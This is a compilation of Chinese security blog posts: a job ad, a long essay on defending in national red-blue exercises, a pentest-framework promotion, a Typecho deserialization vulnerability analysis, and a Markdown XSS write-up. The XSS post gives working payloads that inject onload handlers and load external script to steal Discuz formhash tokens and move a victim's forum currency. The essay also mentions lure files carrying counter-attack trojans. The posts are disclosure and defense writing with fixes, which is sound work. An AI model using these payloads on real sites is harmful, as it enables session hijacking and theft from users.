岗位描述

负责部门内安全反入侵相关工作，包括：

> 纵深防御体系能力建设和提升，如商业安全产品策略运营、入侵检测策略与模型的设计开发及运营、溯源反制能力建设等。

> 安全应急响应能力建设及运营，能够对安全事件进行响应和调查，提高响应和阻断效率。

> 追踪业界安全能力建设实践，发现公司能力短板并规划落地，协调组织内外部红蓝对抗。

任职要求

> 熟悉常见操作系统及服务的供方手法及常见的防御、检测机制。

> 具备Web攻击、网络流量分析、木马/rootkit分析、安全事件调查等相关专业知识。

> 熟悉常见的互联网架构和解决方案，熟悉企业基础安全措施及常见的企业安全最佳实践。

> 熟练运用Java/Python/Go/PHP其中一种编程语言。

> 良好的沟通及团队合作能力，3年以上甲方安全建设经验。

加分项

> 有大型互联网SIEM、SOC、SOAR实际建设和落地运营经验优先。

> 使用Spark、Flink、ELK、Hadoop等大数据架构落地过成熟项目的优先。

base：北京-海淀

点击“查看原文”或联系我投递简历

阅读原文

跳转微信打开

作为攻防演习防守方的一些思考和经验。

0. 前言

笔者于2019年入职阿里巴巴，负责某业务反入侵团队。这三年时间刚好完整参加了三次全国范围的攻防演习活动，第一次是刚入职参加的，刚了解业务，后两次攻防演习作为一号位，带领安全团队均拿下了优异的成绩（全国防守排名前三）。

21年9月加入了默安科技。本文是笔者对阿里这段工作经历的小结，希望能够对大家有所帮助。安全工作还是要结合业务情况来进行部署，不一定完全适用于所有公司。这几年一直在埋头苦干，非常希望与大家多多交流，如有不足之处欢迎批评指正。

1. 确定防守目标

攻防演习开始前，需要提交参演方相关信息，比较关键的的是核心业务系统和蜜罐信息。

前几年演习是有被攻击“出局”这个说法的，核心系统被攻破基本就“出局”了。核心业务系统的选择对结果有重要的影响，所以核心业务系统尽量选择业务隔离内网的目标作为核心目标。不仅可以提升攻击难度，也可以借助演习让攻击者对本单位进行一次彻彻底底的渗透测试。

在明确了核心业务系统后，我们后续的安全排查和加固工作，都要围绕核心业务系统展开。具体排查和加固方式后面3. 安全排查/加固部分重点分享。

另外一个要报备的关键信息是蜜罐，如果没有报备的蜜罐被入侵，不管是自建的还是采购的商业蜜罐，都会算做防守方失分，所以这点一定不能遗漏，尤其是具有高交互特性的蜜罐。蜜罐至少要提供蜜罐的URL、IP、端口、截图。关于蜜罐的部署和利用，我会在后面3.4 反入侵能力增强部分重点讲，蜜罐在威胁感知、溯源反制和威胁情报的重要作用。

2. 组织保障

整个攻防演习期间组织保障非常关键，公司业务层面的重视程度会影响安全排查和加固的效率，间接影响效果。举个最简单的例子，安全团队要梳理各域名资产责任人，需要与运维团队配合，很多老旧的历史资产无人维护，甚至需要找到对应的研发来确认资产所属。如果研发和运维团队认为演习只是安全团队的事情，配合效率低下，这是很可怕的事情。

2.1 项目重要性

为了解决组织内各个团队的配合问题，一定要将演习的优先级在大部门内提起来，这个各个公司可能都不太一样，我们公司是自上而下比较重视攻防演习，所以我们的重点工作主要是制定演习方案。制定好演习方案后与产研、运维、运营等团队达成一致，明确各团队职责，确定演习接口人与安全团队对接。

由于攻防演习本身的性质是针对基础设施的，所以大部分安全部门接到演习任务基本都是“政治任务”，很少会有不重视演习的情况。安全部门要借这个机会尽可能的争取资源、预算，不论整体安全能力如何，每年的攻防演习都是全员配合的重要任务，这是最容易提升安全能力的时候，日常推不动的工作，在演习的背景下，很多问题可以迎刃而解。

除了部门内部的协作外，还要考虑体系内是否有其它安全力量可以合作。比如部分生态公司、合作伙伴与本业务的网络架构有耦合，这些也可能会成为攻击者的突破口，需要对方也做好演习的相关准备，至少要做到攻击情报互通。

2.2 项目启动

在都已经明确各方职责，私下达成一致后，可以开一个项目启动会。介绍演习的背景、规则、目标，以及演习的时间安排、人员安排、工作内容安排等。工作内容是最重要的部分，主要的思路可参考后面3. 安全排查/加固部分的介绍。笔者在其他论坛上看到有人抱怨演习备战中各方都不配合，内部甚至也在“摸鱼”，其实核心原因就是大家的职责不明确，认为自己所做的事情可有可无。所以在启动会上一定要明确这点，大任务分拆成小任务，小任务完不成，大任务也不会有好结果。

2.3 进度风险汇报

项目启动会后，演习正式进入全面备战阶段。

演习备战的大部分工作是安全自身要做的工作，比如Agent部署率、安全产品规则检查等。当然也有很大一部分工作其实并不是安全团队完成，比如业务接入统一认证系统、漏洞修复，可能更多的是研发需要工作，安全部门大多是推动工作，推动的痛苦相信甲乙方的同学应该都了解，如果推不动，对演习结果产生影响是谁都不想看到的，所以备战期间定期进度review非常重要，我们这两年都是秉承着“急事随时汇报，阶段性每周汇报”的思路。说起汇报，就要说一说，汇报给谁？答案是要汇报给兄弟团队，汇报给产研、运维、运营，最重要的是汇报给大领导，因为要汇报的不仅仅是进度，还有需要决策的风险。如果只是汇报进度，周报就完全足够了。

进度汇报的主要思路是围绕“风险”进行汇报，首先是我们目前关注哪些风险？其次是哪些已知的风险落地有风险？比如互联网边界排查，ACL边界开放过大是我们关注的风险，内部系统开放到外部的风险大家都懂，但是我们在排查中就发现有很多内部系统开放到一些未知的IP段，这些IP段看起来似乎也不是本业务的相关IP，但也无人认领。安全部门要不要封禁这些IP段？敢不敢封禁？如何封禁？每周的汇报会上就是要讨论这些风险的如何处理。

3. 安全排查/加固

攻防演习防守的其实是企业资产，演习前的一切安全排查和加固都围绕核心资产展开，以核心资产为中心，向外辐射到各个资产。资产包括物理资产、硬件资产、软件资产等，另外人也是红蓝对抗中最容易造成突破口的资产。梳理资产的目的是为了明确网络边界，只有明确了网络边界和防守边界，才能更好的制定策略。如何梳理全面企业资产我会在3.1 梳理资产部分详细介绍。

我们在落地过程中主要围绕安全部门各小团队的职责来划分工作，读者可以视各自的情况来定。我们主要分为生产网安全、物理安全、数据安全、反入侵这四个部分来构建防御体系。各个团队可能会有部分职责重叠的地方，比如系统网络和应用安全都会面临弱口令等数据安全相关的权限问题，这很正常，在进度风险汇报中说清楚做了哪些，哪些还没做，定清楚Owner即可。

为了保障安全排查的全面性，大部分工作都是正向自查和红队反查的方式进行。下面各章节会详细介绍如何正反怎么配合进行。

3.1 梳理资产

首先资产主要分为硬件资产、软件资产和人。软件资产和人其实相对是比较好收集的，数字化能力相对比较高。硬件资产比较依赖IT和IDC相关部门的能力。不论以何种方式完成资产的梳理，哪怕是Excel来收集，这是一定要做的。

硬件资产主要包括机房设备、网络设备、安全设备、办公网区设备等，这类资产一般涉及到多支团队，需要耗费大量人力投入去梳理。这里需要注意的外采设备的梳理，不论是外采的“盒子”还是私有化部署到服务器上的设备，都要收集到，比如VPN、APT威胁检测设备等，这类设备如果出现漏洞被攻击，比业务主机被拿下的风险还要大。

软件资产主要包括域名、IP、机器、应用等，我们的业务全部上了阿里云，阿里云有完整的API接口可以实现资产的拉取。结合业务使用的云产品，通过阿里云API接口可以基本可以实现云上资产的梳理。

• 域名资产：如果使用了阿里云“云解析”产品，可通过DescribeDomains接口获取所有域名，再通过DescribeDomainRecords接口获取所有子域名。

• IP资产：由于我们的网络架构问题，主要关注负载均衡SLB和弹性公网EIP，SLB可通过DescribeLoadBalancers接口获取所有SLB实例，EIP可以通过DescribeEipAddresses接口获取。

• 应用：阿里云上所有ECS都装了安骑士和态势感知的Agent，可以很方便的取得完整机器列表和IP列表，甚至包括端口开放情况、中间件和版本情况。另外态势感知也会基于中间件版本来匹配已公开漏洞，进行漏洞扫描。

还有一部分资产是“人”，梳理人的资产基本找HR就能拿到全集，梳理这部分数据是为了做后续的安全意识培训和钓鱼演练。

我们第一步花了大量的精力去梳理资产，最终得到了一张公司资产大图，下一步我们要做一件更加痛苦的事情，明确资产责任人和安全责任人。

一般运维团队会有CMDB系统协助我们完成很多资产的归属，但仍有一大部分需要人力推动去确认。如果这里的工作进展的极其痛苦，那么说明日常的安全流程建设，还是有很大的提升空间。如何提升我们在最后的5.2运营机制优化部分细聊。

完成资产梳理工作后，我们就可以正式进入安全自查阶段了。当然，部分已知的安全问题是可以和资产梳理工作同步进行的。

3.2 生产网安全

生产网安全部分主要分为应用安全、系统网络安全、数据和权限安全三大类。

3.2.1 应用安全

应用安全主要围绕漏洞管理和安全方案展开，主要目标是保障生产和测试环境完成安全加固，通过红队渗透测试验收。这里列几个重点工作方向供大家参考。

漏洞修复

已知漏洞修复（含日常SDL检出的漏洞、渗透测试发现的漏洞及其他漏洞）

封网和需求安全评审

演习期间要进行封网，演习期间原则上不允许上线新业务。应用安全团队要积极与产研梳理演习期间要上线的业务，该业务改动较大，安全风险比较大的，建议推迟到演习后上线。

安全能力覆盖率排查

如SDL卡点、白盒扫描、RASP、WAF、安全Agent等安全能力的覆盖率，若未覆盖全的需在演习前覆盖完毕并做好安全检查。

内部高风险系统安全排查

内部高风险系统进行重点安全评估，如运维系统、安全、客服系统。这类系统如果被入侵，通常具有较大权限，甚至可以直接控制线上所有资产。

社会工程学攻击防范

因为演习的规则是允许一定程度的社会工程学攻击的，比如钓鱼邮件、客服系统的攻击，都是比较高频的攻击手法。我们可以考虑在演习期间做一定程度的加固，比如禁止邮箱服务接受外域邮件、客服系统关闭文件上传通道、客服系统超链接点开前二次确认等。

供应链攻击防范

这里包含软件供应链以及生态公司、合作伙伴等，软件供应链主要是检查系统耦合的一些第三方包/库是否安全。对于在网络上存在耦合的合作伙伴和生态公司一方面是要求对方做好加固和值守准备，另一方面是要做好切断合作伙伴与本业务网络通道的应急预案。

3.2.2 系统网络安全

系统网络主要围绕网络边界、访问控制、认证鉴权、主机安全展开。主要目标是确保生产环境、测试环境、预发环境以及办公网的网络安全。列几个重点工作方向供大家参考。

网络隔离排查

网络隔离检查主要两方面，一是边界对外开放情况的摸排，确保内部系统都正确设置了ACL且没有开放过大的情况（比如将内部系统开放给某个大B段）。ACL排查的效果首先取决于3.1 梳理资产部分梳理的资产是否完整。二是内部网络区域划分检查，不要出现“一张网”的情况，防止攻击者突破边界后可直接访问到核心业务系统。

ACL排查主要分为两类，一是域名对外开放的情况排查，二是主机对外开放的排查。我司的安全架构设计的比较严格，所有的主机（ECS）禁止配置弹性公网IP，所有对外开放必须通过SLB，我们通过拉取SLB资产的配置信息即可拿到全部的ACL策略。域名通过拉取WAF/SLB即可拿到所有的ACL策略。所以我们的主要工作都在检查策略上。

检查ACL策略可以先指定一些黑名单，比如对外开放设置为*的，必然需要与业务方确认进行更细力度的设置。设置为大B段的同理。黑名单可以筛掉一大部分异常的ACL规则，白名单的只能逐步与业务方确认。

主机/终端高危漏洞修复

这里主要关注服务器上可被利用的RCE漏洞，未授权漏洞，主要是为了防止黑客利用这些漏洞突破边界，即便被突破，也可以增加横向移动的攻击成本。

如果企业有安装安全Agent，大概率会有主机漏洞扫描的能力，阿里云用户可以使用态势感知进行漏洞扫描，确定要修复的漏洞种类和机器，甚至可以一键修复。当然，修复是有稳定性影响的，需要和运维、研发定好策略，做好备份，按批次修复。

系统弱口令和未授权风险排查

对所有Web系统、安全设备、网络设备进行未授权和弱口令检测。这部分工作要根据梳理的资产写一些小脚本，快速进行检测，可通过主动扫描来做检测，也可通过流量分析来做检测，具体做法这里不细谈。

办公网网络加固

这部分主要是确保终端EDR的部署率，确保安全规则设置无误。可以根据各自的情况做一些相对严格的限制，比如封禁办公网终端间除80，443端口以外的其它端口访问、禁用USB读写（如有强需求建议专机专用）。另外办公网也可以部署一些蜜罐来迷惑攻击者。

办公网的WIFI也可视情况进行加固，如无必要，可在演习期间关闭WIFI网络。

办公网的硬件设备也要注意清点，比如VPN、会议系统等。这类设备很容易对公网开放，且0day比较多，如无必要也可以考虑在演习期间关闭。

3.2.3 数据和权限安全

数据和权限安全团队重点关注账号权限、密钥风险。列几个重点方向供大家参考。

账号权限收敛及密码策略排查

账号权限收敛首先根据梳理的资产明确具有账号权限的核心B类系统，安全设备、网络设备。权限收敛很大一部分工作是做闲置账号的清理。如果公司没有统一认证系统和权限管理系统，那么大概率会出现已离职人员账号未清理、闲置账号（一两年都没用）的情况，这些账号无人使用，如果出现弱口令，被攻击也无人感知，风险极大。密码策略排查这里就不再细说。

密钥治理

由于业务全部上云，各个云产品都有对应的AK/SK，密钥风险的管控在云上尤为重要。主要是密钥泄露风险，如果一个大权限AK被泄露，通过API基本可以控制云上所有资产。泄露的核心原因还是明文存储，在代码中明文存储、在服务器上明文存储、在脚本里明文存储。治理思路首先是排查大权限AK，确认是否有开这么大权限的必要，如果确实有必要，是否可以缩小为只读权限。排查明文存储根据我们的工作场景，主要排查主机文件、OSS Bucket上的文件、Git仓库文件，撰写脚本批量排查这些地方是否有明文存储AK的情况并进行整改。

另外一个方式是对AK做ACL限制，限制AK仅允许生产网的IP段访问API，另外听说阿里云后续要做到AK限制到只有哪个VPC来访问，这里给阿里云点个赞，期待。AK限制ACL这件事推动比较难，在AK申请流程中增加限制可解决增量问题，存量未设置ACL的AK就需要日常去推进了。

密钥治理我们更多的是在讲限制，但问题肯定是没法全部覆盖的，所以我们需要有兜底的手段，我们是通过与反入侵团队合作，调取AK调用记录，定制监控，若AK被非生产网IP所调用，会实时告警。

3.3 物理安全

物理安全顾名思义，也有不少需要注意的点。

3.3.1 办公区物理安全

办公区物理安全主要是防止近源攻击，WI-FI网络、RFID门禁、暴露的有线网口、USB接口等都可能会成为近源攻击的对象，比如我们当时就发现门口的打卡机连接的网线，可以直入办公网。还有乙方老生常谈的“捡U盘”、医院的服务终端机沙盒bypass等。各位可根据实际情况进行对应的加固。

3.3.2 机房物理安全

我司机房也有对应的安全团队，所以额外做了些限制和监控，托管的IDC可做的事情不多，这里不细说。

3.3.3 人员安全意识

人员安全意识比较关键，安全攻防核心其实是人的对抗。理解攻防演习通过社工攻击人的情况太多了，所以一定要做全员安全意识培训，不同工作性质的人群遇到的风险可能不近相同，比如客服是最容易被钓鱼的，那就要对症下药，政策和安全意识教育两手抓。

3.4 反入侵能力增强

聊起反入侵，其实很多公司可能没有反入侵这支团队，入侵检测和应急响应的事情更多的是其它安全工程师兼着就做了，但反入侵这些事情，对攻防演习的效果有决定性的影响。

笔者在阿里主要负责某个业务的反入侵（非集团/阿里云反入侵团队），团队职责主要是威胁感知和应急响应。因为部分思路和技术非本人原创，所以这里只能选择性的分享一些我自己的思考和实践。

我这里按照渗透测试、威胁情报、威胁感知、应急响应、溯源反制五个方面来详细介绍。因为红队的职责也在我这里，所以渗透测试也在这里一同分享。

3.4.1 渗透测试

其实常规的渗透测试可说的不多，每年我们在攻防演习前都会请阿里云对业务进行全面的渗透测试。因为演习目标是“零”失分，所以渗透测试重点一般是模拟突破边界。当然，在日常的渗透测试中也会做东西向渗透测试。

反向验证，在渗透测试这个部分单独说一下。我们安全团队虽然大家做的事情都是为了提升安全能力，但还是分为了以安全加固为主的“正向团队”和更偏攻防实战的“反向团队”。在演习前做的所有加固工作，反向团队都会进行验证。举两个例子，第一个是正向团队为了确保安全防护效果排查了WAF的部署率，那反向团队就会做反向扫描，看是否有遗漏？以及WAF规则是否都正确开启？结果还真发现了由于阿里云WAF大版本更新，IP加白/加黑配置方式变化，导致大版本更新后配置的ACL加白全部无效的情况。第二个是正向团队推进业务接入统一认证系统，结果在反向验证中发现统一认证系统接入SDK并不统一，各个业务放接入方式不一致，导致部分认证可被绕过。

说这么多是为了告诉大家，做安全加固还是要验证，不能太相信“经验”。

3.4.2 威胁情报

实战攻防演习在演习期间，其实是“情报战”。第一年参加演习的时候，感觉雷达就是黑的，不知道谁攻击了我，也不知道现在演习到底什么情况，非常惶恐，这其实就是情报不到位导致的。另外在威胁感知、应急响应、溯源反制大量利用到威胁情报，所以第二部分重点讲一下威胁情报的生产和消费。

威胁情报生产

我们建设了一个内部的威胁情报库，主要包括IP、UMID、UID、姓名、威胁类型、威胁等级、情报可信度等字段。根据如下信息产出威胁情报：

• 历史WAF、态势感知、安骑士、云防火墙、自建告警攻击记录

• 实时沉淀安全告警信息

• 互联网公开威胁情报收集

• 威胁情报蜜罐

• 三方安全厂商及威胁情报厂商合作

• 合作伙伴及生态公司威胁情报共享

上面列的这些威胁情报来源都比较好理解，历史攻击记录都存在ODPS中，通过ODPS SQL就可以查询出对应的信息并写入到威胁情报库。

阿里云大部分云产品日志都存储在日志服务SLS中，通过Blink或SLS自带的数据加工功能即可筛选想要的实时告警写入到威胁情报库。

互联网公开威胁情报就写对应的爬虫存入威胁情报库即可，这里推荐一个免费开源的firehol威胁情报库，firehol本身收集恶意IP是为了做防火墙规则的，当然也可以作为威胁情报来使用。firehol的缺点是只有IP和大致类别，没有更详细的字段。

威胁情报蜜罐这个顾名思义，甲方做的话成本比较高，要考虑投入产出比。建议了解下三方安全厂商和威胁情报厂商，另外默安科技的幻阵蜜罐目前用的厂商比较多，其实是能产出较多的威胁情报的，采购一波默安蜜罐，既能做威胁感知，又可以白嫖重保期间的威胁情报。

合作伙伴和生态公司威胁情报这个也很好理解，需要提前制定好威胁情报格式或者使用国际通用的STIX/TAXII格式，然后推动合作伙伴按照该格式共享威胁情报。当然，也可以在战时人工同步。

威胁情报消费

当我们收集了足够多的威胁情报后，只有在消费/利用了情报才会产生价值，否则就仅仅只是“威胁情报”。

情报消费消费主要分为三大场景：拦截、感知、响应。

拦截：高精准度的威胁情报，我们可以直接加入到防火墙规则拦截，比如firehol的威胁情报就分为很多种，有的是恶意邮件、有的是曾经是C2服务器，还有一类是目前没有被分配的IP，这类IP正常情况是不可能有访问行为的。大家可以根据自身业务情况，选择可以拦截的情报进行主动拦截。

感知：我们所有业务都在阿里云上，阿里云提供了所有ECS的网络连接日志，所以我们可以监测ECS外联威胁情报恶意IP的情况，包括Web访问日志可以过一遍威胁情报。部分无法直接拦截的情报，也可在内网网络连接中进行检测和告警。

响应：演习期间的告警量往往比平时高好几倍，为了提高告警运营效率，我们将所有告警统一到一起，全部过一遍威胁情报，告警运营时可参考威胁情报的评级重点关注相关告警。

威胁情报消费部分这里只是简单讲了讲思路，具体的做法在后面几个小章节里面会细讲。

3.4.2 威胁感知

威胁感知就像是攻防演习打仗时候的情报来源，像雷达一样。威胁感知做的不好，雷达上就一片黑。我们威胁感知的basline是靠阿里云WAF、威胁感知、安骑士等云安全产品支撑。

为了进一步提升威胁感知能力，我们在威胁情报、蜜罐、蜜饵、核心系统重保等方面也下了不少功夫。

蜜罐部署

我认为蜜罐有两个重大意义，一是做威胁感知的兜底，二是溯源反制的利器（后面3.4.4 溯源反制里面重点讲下如何利用蜜罐来做溯源）。大部分安全产品和自建的告警，其实是基于恶意行为的检测，都是“黑名单”，如果没有对某种威胁行为建模，就无法捕获这类攻击行为，所以蜜罐的部署和覆盖策略就非常关键。

蜜罐的原理是模拟真实业务系统，投放诱饵吸引攻击者攻击，攻击者攻击后蜜罐产出告警，达到威胁感知的能力。

互联网和内网面临的攻击手法大不同相同，所以我们在互联网上部署高交互、高仿真的蜜罐，吸引攻击者进行攻击，在蜜罐上植入溯源代码，获取攻击者的互联网ID、设备指纹等信息。除了采购安全公司的蜜罐（疯狂暗示默安幻阵），有条件的单位可以将自己的业务系统代码拿出来，剥离掉所有功能，仅保留登录功能，登录功能使用SSO，这样攻击者在攻击时一定会注册业务系统账号，可能就会留下注册所需的邮箱、手机号、IP等信息，便于识别和溯源攻击者。

扩大蜜罐感知面

互联网蜜罐在部署上我们一般会选择OA、VPN、MAIL等沙箱，那么互联网蜜罐可以使用oa.xxxx.com、vpn.xxxx.com、sslvpn.xxxx.com、webmail.xxxx.com诸如此类的域名，但要注意的是一定要在演习前将该域名报备到蜜罐列表中，否则蜜罐被攻击可能会导致失分。

内网蜜罐主要是为了发现攻击者进入到内网的情况，所以部署的越广越好，但内网假设有1000台机器，我们不可能部署1000台蜜罐，一般的思路是在每个网络区中部署一套蜜罐，然后在该网络区其它机器上部署流量转发脚本，将业务不需要的端口流量转发到内网蜜罐中。

我们的业务是全部上云的，如果是传统IDC厂商，默安有个硬件设备，叫做“中继节点”，部署在交换机上，可以将VLAN中空闲IP流量转发到蜜罐沙箱中（当然，得搭配默安的蜜罐使用）。

诱饵投放

投放诱饵其实也是为了扩大蜜罐感知面，吸引攻击者来进行攻击。投放诱饵其实是顺着攻击者的思路来进行投放，攻击者在做攻击的第一步永远是信息收集，那么攻击者会收集哪里的信息？答案是：Github、百度文库、百度网盘、企查查等等，红队信息收集手法很多，我们在这些必经之路上都可以设置诱饵，比如我们在Github上传一些代码，其中夹杂着蜜罐的URL，甚至放个假密码上去。在百度文库上上传一个XX系统使用文档，里面包含蜜罐的URL和默认账号密码。在百度网盘上传个反制木马，命名为“XXX单位VPN使用帮助”，诸如此类，可做的很多。不过这里想要起到更好的效果，可以先对本单位做一次互联网风险暴露面的排查，看看重灾区在哪，边做排查清理，边做诱饵的投放。在Github上投放诱饵也有一个小tips，如果我们按照正常流程上传代码，那么Github会显示该项目是1秒前刚上传，攻击者又不傻，HW各个公司都在做安全意识培训，怎么可能有研发蠢到在这个时间点上传代码到Github，所以我们可以通过修改系统时间，然后commit的方式，让Github显示这个代码是x年前/x个月前上传的代码。像这样的小tips非常非常多，就不在这里赘述了，我的建议是，买默安的重保服务吧。

3.4.4 应急响应

3.4.4.1 完善感知和处置能力

攻防演习核心其实是攻击和防守，防守上有两个重点，一个是感知（发现攻击），另一个是处置（阻断攻击）。首先在网络层面，至少需要有全流量安全感知设备，可以配套用蜜罐来做兜底的威胁检测。这里也可以做的比较细，比如从互联网的攻击可以用WAF来做感知和阻断，办公网的可以用EDR来做感知和阻断，办公网VLAN间用防火墙来做隔离，邮件安全用邮件网关，诸如此类，要保障几乎所有外到内、内到内的路径我们能发现攻击，且能阻断攻击。

3.4.4.2 完善处置流程

感知和处置能力完成以后，还要考虑人为因素，应急响应流程应该由谁来发起，谁来审批，谁来执行处置动作。这类预案要提前设好，比如DMZ区的主机权限被控如何应急、隔离内网的主机被控如何应急、Web发现攻击如何应急、如果流程上审批都通过了，技术人员按照哪种步骤进行应急。这都要提前写好预案，至少有技术上的playbook。

3.4.4.3 应急演练

应急演练主要是两个目的，一是验证处置能力是否有效。二是验证应急响应流程是否有效。

首先是验证处置能力是否有效，比如：模拟黑客攻击Web，看WAF是否能发现Web被攻击，使用WAF进行拦截，验证WAF拦截的有效性、时效性等。主机侧和网络侧类似。

二是验证应急响应流程是否有效。比如：发现某类攻击，启动应急响应流程，关键人是否敢审批？我们之前在突击演练中就发现一些问题，当技术提交应急响应流程单以后，客户需要层层向上报批，一直报到大领导，才敢审批，这个过程持续了将近30分钟，应急响应的难度大大增加。这种情况就需要对流程进行优化。

3.4.4 溯源反制

规划文章目录的时候，规划了溯源反制，但觉得内容太敏感，这里就省略了。

如果真的感兴趣，建议是私聊我微信吧。

4. 总结

这篇文章缝缝补补写了很久，内容主要围绕在反入侵和攻防的内容，因为这是我的职责所在。现在回头看，觉得写的挺不好的，有很多地方值得改进，不过还是分享出来供大家参考讨论。

最后发个小广告，我目前在默安科技主要负责010实验室，base北京，日常也会打红队项目，也会帮助客户做安全建设，欢迎感兴趣的小伙伴加入我们。

我的联系方式如下：

微信：StrikerSb

邮箱：wangsong#moresec.cn

阅读原文

跳转微信打开

WebPocket 是一个轻量级渗透测试辅助框架，使用Python3.7构建。

WebPocket 是一个轻量级渗透测试辅助框架，使用Python3.7构建，整体思路借鉴自 Metasploit 。

包含 use, search, list, show, exploit 等命令，可通过help命令查看全部命令。

本框架仅为沉淀安全研究成果，方便甲方公司及安全人员自测漏洞使用，请勿用于非授权的渗透测试，请使用者遵守《中华人民共和国网络安全法》，本人及公司不负任何连带法律责任

项目地址：https://github.com/TuuuNya/WebPocket

中文文档：https://webpocket.readthedocs.io/zh_CN/latest/

下载 && 安装

首先克隆最新的代码到本地

git clone https://github.com/TuuuNya/WebPocket

然后安装Python所需的模块

pip install requirements.txt

如果要使用虚拟环境可自行安装virtualenv等Python虚拟环境。

执行如下命令，如果看到WebPocket的Banner则为安装完成。

python WebPocket.py
➜ python3 WebPocket.py
WebPocket
(✿ ♥‿♥)   WebPocket has 2 modules
WebPocket >

查看原文可进入Github项目页。

开源不易，点击“好看”帮忙传播，感谢！

阅读原文

跳转微信打开

一不小心，博客就被黑了呢……

最早知道这个漏洞是在一个微信群里，说是install.php文件里面有个后门，看到别人给的截图一看就知道是个PHP反序列化漏洞，赶紧上服务器看了看自己的博客，发现自己也中招了，相关代码如下：

然后果断在文件第一行加上了die:

今天下午刚好空闲下来，就赶紧拿出来代码看看。

漏洞分析

先从install.php开始跟，229~235行：

要让代码执行到这里需要满足一些条件：

首先是$_GET['finish']不为空，其次是referer需要是本站，比较容易实现。

继续跟反序列化的地方：

首先使用Typecho_Cookie的get方法获取__typecho_config，get方法如下：

可以看到给$value赋值这一行，如果$_COOKIE里面没有就从$_POST里面获取，所以我们测试漏洞的时候直接POST也是可以的，不用每次设置Cookie了。

反序列化漏洞要利用势必离不开魔术方法，我之前收集了一些和PHP反序列化有关的PHP函数：

下面这一行中，如果我们反序列化构造一个数组，其中adapter设置为一个类，那么就可以触发这个类的__toString()方法。

然后我们全局搜索__toString()方法，发现两个有搞头的文件：

我这里跟一下Feed.php，查看Feed.php的__toString（）方法，其中第290行：

其中调用了$item['author']->screenName，$item是$this->_items的foreach循环出来的，并且$this->_items是Typecho_Feed类的一个private属性。

我们可以利用这个$item来调用某个类的__get()方法，上面说过__get()方法是用于从不可访问的属性读取数据，实际执行中这里会获取该类的screenName属性，如果我们给$item['author']设置的类中没有screenName就会执行该类的__get()方法，我们继续来全局搜索一下__get()方法。

发现/var/Typecho/Request.php中的__get()方法如下：

跟进$this->get()方法如下：

这里没什么问题，但最后一行：

跟进一下发现：

这个foreach里面判断如果$value是数组就执行array_map否则调用call_user_func，这俩函数都是执行代码的关键方法。而这里$filter和$value我们几乎都是可以间接控制的，所以就可以利用call_user_func或者array_map来执行代码，比如我们设置$filter为数组，第一个数组键值是assert，$value设置php代码，即可执行。

然后我们来完成Exploit如下：

然后运行该php，使用输出的payload访问：

至此该漏洞复现成功。

修复方法

• 官方今天发布了1.1Beta版本修复了该漏洞，升级该版本，链接：http://typecho.org/archives/133/

• 也可以删除掉install.php和install目录。

安全&前端

长按二维码
关注我们

阅读原文

跳转微信打开

学了这么多年黑客，终于黑了一次黑客了，感觉人生都圆满了呢~~

T00LS在前段时间开启了Markdown支持，这个漏洞也正是Markdown的问题导致的。

Markdown本身是一种标记语言，在网页上的应用也很简单，比如当我在Markdown中输入**加粗**，那么经过转换之后，这个短句将会变成<strong>加粗</strong>。其实也是一系列的html转换，由此就会出现很多XSS的问题。

下面我结合T00LS的实例简单说一说Markdown的XSS漏洞。

最基础的栗子，点击触发XSS

很多人了解markdown以后，可能想到的第一个XSS就是这个。

我们知道markdown可以插入超链接。用法如下：

[王松的博客](http://www.hackersb.cn)

渲染出来的效果如下：

那么如果我们使用伪协议呢？比如：

[XSS](javascript:alert(1))

答案是可以弹框。然后我们尝试弹出Cookies，但是Discuz的cookies都设置了httponly，也就是说无法用javascript来获取cookies。

但是我们可以获取Discuz的formhash呀，在Discuz中，为了防止CSRF，几乎每个操作都使用了formhash，我们能获取到formhash，就可以操作当前账户几乎所有的动作了。

那么用js如何获取Dz的formhash呢？

在帖子正文页，我们可能会需要回帖，所以肯定会有formhash，如下：

那么我们就可以用js操作来获取了。

获取到formhash以后，我们可以选择直接发送请求来用formhash做点“有趣的事情”，比如发帖，转账？

高级一点，自动触发

在上面的操作中，我们需要被攻击者点击超链接才可以触发漏洞，那么我们能不能直接触发呢？

我们先来看看在markdown中如何使用图片吧。栗子如下：

![头像](https://www.t00ls.net/uc_server/data/avatar/000/01/08/66_avatar_middle.jpg)

渲染效果如下：

我们先来看看转换后的html长啥样吧：

我们在[]中输入的内容变成了html中的alt，那么如果我们在这中间用双引号是否能够逃逸出来，加个onload或者onerror属性呢？

比如：

![头像" onload=alert(1)](https://www.t00ls.net/uc_server/data/avatar/000/01/08/66_avatar_middle.jpg)

输出结果如下：



很明显alert后面多了一个双引号，所以我们简单改一下payload，注释掉后面：

![头像" onload=alert(1);//](https://www.t00ls.net/uc_server/data/avatar/000/01/08/66_avatar_middle.jpg)

然后刷新以后：

果然执行了…… 这个时候已经自动触发了。

输出样式如下：

一个能自动触发的XSS，可比需要点击的XSS威力大了许多。

但是在实战中我们要执行的js代码可能会非常长，所以在onload里面写js难免会很麻烦。

so 我们需要引入外部js。

再高级一些，引入外部js

这次我们直接点，payload如下：

![头像" onload=s=createElement('script');body.appendChild(s);s.src='外部js的url';//](https://www.t00ls.net/uc_server/data/avatar/000/01/08/66_avatar_middle.jpg)

比如我们引用一个弹出formhash的js：

这里我用到了安全盒子的XSS平台，地址是x.secbox.cn

成功弹出formhash：

实例：转走别人的Tubi

我们先来选一个目标，这里我就选择我们团队的核心大佬 @phithon 了。

为了不误伤其他小伙伴，我这里就编辑我以前的帖子，发给phithon师傅去看，从而触发XSS。

基本思路如下：

1. p神访问触发XSS

2. 获取formhash

3. 发送请求模拟赞赏帖子

这里选择赞赏贴子的原因是因为银行转账需要输入论坛密码，无法模拟转账，我们只是做漏洞演示，所以赞赏就够啦。

赞赏也是可以自定义tubi的，我们就来“偷”10个p神的tubi吧~

payload编写

很简单的payload就不解释了，如下：

然后引入一下,即可“偷”tubi：

那么我们现在把这个帖子发给phithon师傅去看。

好了，我们现在再把这个url发给雨神：

战果：

感谢phithon和lcy的1tubi，还有t00ls管理团队和雨神的10tubi。

实例：蠕虫

不敢写，想想整个T00LS都弥漫着蠕虫的气息，我就觉得害怕。

漏洞修复及总结

Markdown转换到html后，再进行一系列的过滤吧，html属性白名单什么的，也可以使用开源的项目，比如：http://htmlpurifier.org/

其实拿到Discuz的formhash能做的事情很多很多…… 比如置顶帖子，修改版规，等等，如果是有后台权限的管理员触发，或许还可以模拟后台的一些操作，危害是挺大的。

最后再次感谢phithon和lcy的1tubi，还有t00ls管理团队和雨神的10tubi。

抱拳了老铁。

漏洞发现后已第一时间通知官方，截至发稿前，漏洞已修复。

安全&前端

长按二维码
